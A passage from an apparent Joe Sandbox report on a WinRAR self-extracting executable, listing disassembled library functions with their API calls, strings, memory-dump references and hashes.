                                                              • API ID: _wcslen
                                                              • String ID: @4$J4$Software\WinRAR SFX$h4
                                                              • API String ID: 176396367-2013926500
                                                              • Opcode ID: 5dd03e9b1a27a913570f0b89c2a907e5f6d770556eca77a51768599204e1b97a
                                                              • Instruction ID: c67348d6da09a10ad98ca50d1a4260b6ff3bbca02a40e23b43d97e747dd0a47e
                                                              • Opcode Fuzzy Hash: 5dd03e9b1a27a913570f0b89c2a907e5f6d770556eca77a51768599204e1b97a
                                                              • Instruction Fuzzy Hash: 22017171400228BEDF319B91DC4AFDF7FACEB05354F444056B509B40A1DBB18A88D7A0
                                                              Function 00E9C7B8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00E9C769,00000003,?,00E9C709,00000003,00EB0A08,0000000C,00E9C860,00000003,00000002), ref: 00E9C7D8
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E9C7EB
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00E9C769,00000003,?,00E9C709,00000003,00EB0A08,0000000C,00E9C860,00000003,00000002,00000000), ref: 00E9C80E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: e3e94c42940b8d38fec6ee026f1f23f6e54f2d95064b66f8113377f41e7e0e32
                                                              • Instruction ID: 64e2f740b2a7a858c7e73c3362bcb796a68d55eadfa1f9e7872d8c5852162cba
                                                              • Opcode Fuzzy Hash: e3e94c42940b8d38fec6ee026f1f23f6e54f2d95064b66f8113377f41e7e0e32
                                                              • Instruction Fuzzy Hash: 07F04471A01618BFDB159FA1EC09BAE7FB4EF49715F114168F805B6250DF306D49CA90
                                                              Function 00E9755A Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AdjustPointer$_abort
                                                              • String ID:
                                                              • API String ID: 2252061734-0
                                                              • Opcode ID: 63c6fad0c27308e77c94dfd6c17512139325cb4e89b7834529790c3a0696a99a
                                                              • Instruction ID: 6b3d3956c39599a488e2fa72762b3c4a96dccd055844b922c15e9dd2c94b4c48
                                                              • Opcode Fuzzy Hash: 63c6fad0c27308e77c94dfd6c17512139325cb4e89b7834529790c3a0696a99a
                                                              • Instruction Fuzzy Hash: ED51E672619B029FDF298F58D851BBA77B4EF44304F14551DE885B72A2E731EC88CB90
                                                              Function 00EA08B0 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00EA08B9
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EA08DC
                                                                • Part of subcall function 00E9DA90: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E98B1E,?,0000015D,?,?,?,?,00E99FFA,000000FF,00000000,?,?), ref: 00E9DAC2
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00EA0902
                                                              • _free.LIBCMT ref: 00EA0915
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EA0924
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                              • String ID:
                                                              • API String ID: 336800556-0
                                                              • Opcode ID: e2bba399b324f0bee222dda3271017e78eb912c81897839881ad605e782ad4f9
                                                              • Instruction ID: 0f2e664933da132e7aab5e7d37bb9779c4abee4b64e8f445a6b6e65d25d2e7e1
                                                              • Opcode Fuzzy Hash: e2bba399b324f0bee222dda3271017e78eb912c81897839881ad605e782ad4f9
                                                              • Instruction Fuzzy Hash: 6A01D8727026197F376116665D8CC7B6AADEECFB943140129B904EB142DE60AD0181B0
                                                              Function 00EA117F Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 00EA1197
                                                                • Part of subcall function 00E9D758: RtlFreeHeap.NTDLL(00000000,00000000,?,00EA1216,?,00000000,?,00000000,?,00EA123D,?,00000007,?,?,00EA163A,?), ref: 00E9D76E
                                                                • Part of subcall function 00E9D758: GetLastError.KERNEL32(?,?,00EA1216,?,00000000,?,00000000,?,00EA123D,?,00000007,?,?,00EA163A,?,?), ref: 00E9D780
                                                              • _free.LIBCMT ref: 00EA11A9
                                                              • _free.LIBCMT ref: 00EA11BB
                                                              • _free.LIBCMT ref: 00EA11CD
                                                              • _free.LIBCMT ref: 00EA11DF
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 703955d041823f7f35ba9073b3620000da6fb047858c7a54cb18f8ecfe76a8ca
                                                              • Instruction ID: f7148923f35b152e28554e8119d64c6c184ff573e0811926fa6dd938ee63022a
                                                              • Opcode Fuzzy Hash: 703955d041823f7f35ba9073b3620000da6fb047858c7a54cb18f8ecfe76a8ca
                                                              • Instruction Fuzzy Hash: 7CF04F32549618AFCA60DBA5EDC6C2A77EDAB05314BA42846F20CFB540CA30FD808650
                                                              Function 00E87D46 Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00E87D4E
                                                              • _wcslen.LIBCMT ref: 00E87D5F
                                                              • _wcslen.LIBCMT ref: 00E87D6F
                                                              • _wcslen.LIBCMT ref: 00E87D7D
                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00E82E75,?,?,00000000,?,?,?), ref: 00E87D98
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcslen$CompareString
                                                              • String ID:
                                                              • API String ID: 3397213944-0
                                                              • Opcode ID: 95f2bd16391915cc692f2e71e5d805c7915daac8eb9561c416343544ff5119ca
                                                              • Instruction ID: 9f0274273fadf22e19cfae61dd051a75f118a49e6ab92c20c82143b799ff3c74
                                                              • Opcode Fuzzy Hash: 95f2bd16391915cc692f2e71e5d805c7915daac8eb9561c416343544ff5119ca
                                                              • Instruction Fuzzy Hash: 95F01D32008114BBCF222F91DC49DDA3F66EF46770B21A416F65DBA0A1CE32D555D7D0
                                                              Function 00E8FA2C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 237COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00E8F8B9: GetDC.USER32(00000000), ref: 00E8F8BD
                                                                • Part of subcall function 00E8F8B9: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E8F8C8
                                                                • Part of subcall function 00E8F8B9: ReleaseDC.USER32(00000000,00000000), ref: 00E8F8D3
                                                              • GetObjectW.GDI32(?,00000018,?), ref: 00E8FA5C
                                                                • Part of subcall function 00E8FCE9: GetDC.USER32(00000000), ref: 00E8FCF2
                                                                • Part of subcall function 00E8FCE9: GetObjectW.GDI32(?,00000018,?), ref: 00E8FD21
                                                                • Part of subcall function 00E8FCE9: ReleaseDC.USER32(00000000,?), ref: 00E8FDB9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ObjectRelease$CapsDevice
                                                              • String ID: ($4
                                                              • API String ID: 1061551593-1598383727
                                                              • Opcode ID: 5551ca7be093eae5d25e8883e27b4267937182f183b547e4d6462bee8af65e38
                                                              • Instruction ID: 64468b9243ab92e8ceeca35d930964d2de2354b9a9e077608c0e4935ae42aede
                                                              • Opcode Fuzzy Hash: 5551ca7be093eae5d25e8883e27b4267937182f183b547e4d6462bee8af65e38
                                                              • Instruction Fuzzy Hash: 8691E271604754AFC714EF25E844A6BBBF8FBC9710F10486DF99AE7260DB30A905CB62
                                                              Function 00E8737C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _swprintf
                                                              • String ID: %ls$%s: %s
                                                              • API String ID: 589789837-2259941744
                                                              • Opcode ID: 5ddfb562a947fc786d9b025ce5cca1e498d51e1dc34deea04a4bed6dd4f54efd
                                                              • Instruction ID: fbc78655667612b3f9d2f4e3d1efddb57c027b0ed06204cb301438b2e091e705
                                                              • Opcode Fuzzy Hash: 5ddfb562a947fc786d9b025ce5cca1e498d51e1dc34deea04a4bed6dd4f54efd
                                                              • Instruction Fuzzy Hash: 4751D63554C305FEEB213A94CD06FB67A95EB04B40F30A416B7DE744E1DAA1E610BB13
                                                              Function 00E9C8B3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe,00000104), ref: 00E9C8F3
                                                              • _free.LIBCMT ref: 00E9C9BE
                                                              • _free.LIBCMT ref: 00E9C9C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$FileModuleName
                                                              • String ID: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe
                                                              • API String ID: 2506810119-4218244530
                                                              • Opcode ID: afa9c9af2c1049fe06262d76b4a4cc9019f77e2344d4194ae3f064e55c4cada8
                                                              • Instruction ID: 3633ed1a0de351135f0b777170558dda6873b15a5d0763247117db198c4ff1f1
                                                              • Opcode Fuzzy Hash: afa9c9af2c1049fe06262d76b4a4cc9019f77e2344d4194ae3f064e55c4cada8
                                                              • Instruction Fuzzy Hash: 79316E71A04258AFDF21EB999D819AEBBFCEFC5714F205066F808B7211DA709E44CB91
                                                              Function 00E97B56 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00E97B7B
                                                              • _abort.LIBCMT ref: 00E97C86
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: EncodePointer_abort
                                                              • String ID: MOC$RCC
                                                              • API String ID: 948111806-2084237596
                                                              • Opcode ID: fc2ae1cf0d8cebd44e739f14f7c5c142d615fab81ab663222657f415bb67aba3
                                                              • Instruction ID: 8c032b4ef3c0deb6e92732df061ded5dfb95be4b7c15373cbb598760ffd56e79
                                                              • Opcode Fuzzy Hash: fc2ae1cf0d8cebd44e739f14f7c5c142d615fab81ab663222657f415bb67aba3
                                                              • Instruction Fuzzy Hash: 0B419A71904209AFCF16CF98CD81AEEBBB5FF08304F199059F94477251D336A954DB50
                                                              Function 00E904CE Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: D+$}
                                                              • API String ID: 176396367-3171742791
                                                              • Opcode ID: 88e46eaa91926850f549d7572447916211aa95ef5049958eb3e8a29d5de8639c
                                                              • Instruction ID: 2d21f4ff250e7aa36d61d9042dd18810f7f78359aa1de506156c30bd44ee4e0e
                                                              • Opcode Fuzzy Hash: 88e46eaa91926850f549d7572447916211aa95ef5049958eb3e8a29d5de8639c
                                                              • Instruction Fuzzy Hash: 4021357290430A5EDF31EB64D845A6BB3ECDF81718F91242AF640E3101EB70ED48C7A2
                                                              Function 00E83F4C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __fprintf_l.LIBCMT ref: 00E83FB4
                                                              • _strncpy.LIBCMT ref: 00E83FFA
                                                                • Part of subcall function 00E87B46: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00E8498A,?,00000000,00000000,?,?,?,00E8498A,?,?,00000050), ref: 00E87B63
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                              • String ID: $%s$@%s
                                                              • API String ID: 562999700-834177443
                                                              • Opcode ID: 82bcaac0b9c5dc236b9ae416ecc84d7b267fdc46c8a140839bb130b339ee6a4a
                                                              • Instruction ID: 7e9f115e58d1d7c83dc8f8b4b306dcb73556f79ea4e930654d2c602cf91f92d1
                                                              • Opcode Fuzzy Hash: 82bcaac0b9c5dc236b9ae416ecc84d7b267fdc46c8a140839bb130b339ee6a4a
                                                              • Instruction Fuzzy Hash: 55218E72940308AAEF21EEB4CD06FDE7BE9AB15704F041122FA1CB61A1E671D6488B91
                                                              Function 00E902B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00E811E6: GetDlgItem.USER32(00000000,00003021), ref: 00E8122A
                                                                • Part of subcall function 00E811E6: SetWindowTextW.USER32(00000000,00EA8574), ref: 00E81240
                                                              • EndDialog.USER32(?,00000001), ref: 00E902FE
                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00E90316
                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 00E90344
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ItemText$DialogWindow
                                                              • String ID: GETPASSWORD1
                                                              • API String ID: 445417207-3292211884
                                                              • Opcode ID: 54746c1c356ef7efa8a9156d05288a4821dc7fab9d1b14f28d486d313f71d088
                                                              • Instruction ID: d2546cdd2ae36977a03e5ac5bbc91098f79246ecc5a3c0020b6c530520681ce8
                                                              • Opcode Fuzzy Hash: 54746c1c356ef7efa8a9156d05288a4821dc7fab9d1b14f28d486d313f71d088
                                                              • Instruction Fuzzy Hash: 1D110432940118BFDF21AB649C8DFFB3BBCEB4A754F801011F649BA181C2A1A985C770
                                                              Function 00E876BC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 00E876E6
                                                                • Part of subcall function 00E839A9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E839BC
                                                                • Part of subcall function 00E817D7: GetLastError.KERNEL32(00E81950,00000000,00000400), ref: 00E817D7
                                                                • Part of subcall function 00E817D7: FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00E817F8
                                                              • GetLastError.KERNEL32(?,00000200), ref: 00E8772E
                                                              • SetLastError.KERNEL32(00000000,?,00000000,00000096,00000035), ref: 00E8775C
                                                                • Part of subcall function 00E868A5: _wcslen.LIBCMT ref: 00E868AB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$FormatMessage__vswprintf_c_l_swprintf_wcslen
                                                              • String ID: D+
                                                              • API String ID: 1654949425-1750190960
                                                              • Opcode ID: 047775be3edc6a0981b80a93c7d939c7d5ee7020ad4e8ea5ae896e93e2fb21ac
                                                              • Instruction ID: 738acf84cccd9b7a78d261dfb84241aa19b5f7d798c05f556b026d78eecf8a38
                                                              • Opcode Fuzzy Hash: 047775be3edc6a0981b80a93c7d939c7d5ee7020ad4e8ea5ae896e93e2fb21ac
                                                              • Instruction Fuzzy Hash: 9501DD768412187EEB11BBA48C4AFDB77ACFF09785F041096B60DF2181D975AA448BA1
                                                              Function 00E935FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualQuery.KERNEL32(80000000,C5,0000001C,00E93738,00000000,?,?,?,?,?,?,?,00E93543,00000004,00EE832C,00E937C8), ref: 00E9360F
                                                              • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00E93543,00000004,00EE832C,00E937C8), ref: 00E9362A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InfoQuerySystemVirtual
                                                              • String ID: C5$D
                                                              • API String ID: 401686933-510796074
                                                              • Opcode ID: 496ec935105ab3b99c599bbfb85c2101d0cd666327e5f6cbbf72099b926082db
                                                              • Instruction ID: d45a607f000d04b814ed69aa3f2783d8f8e52f11922aa293a89b0d5b1f9b6d32
                                                              • Opcode Fuzzy Hash: 496ec935105ab3b99c599bbfb85c2101d0cd666327e5f6cbbf72099b926082db
                                                              • Instruction Fuzzy Hash: 6D012B72700109ABCF14DE29CC05BDE7BEAAFC5368F0CC221ED59E7251EA34E906C680
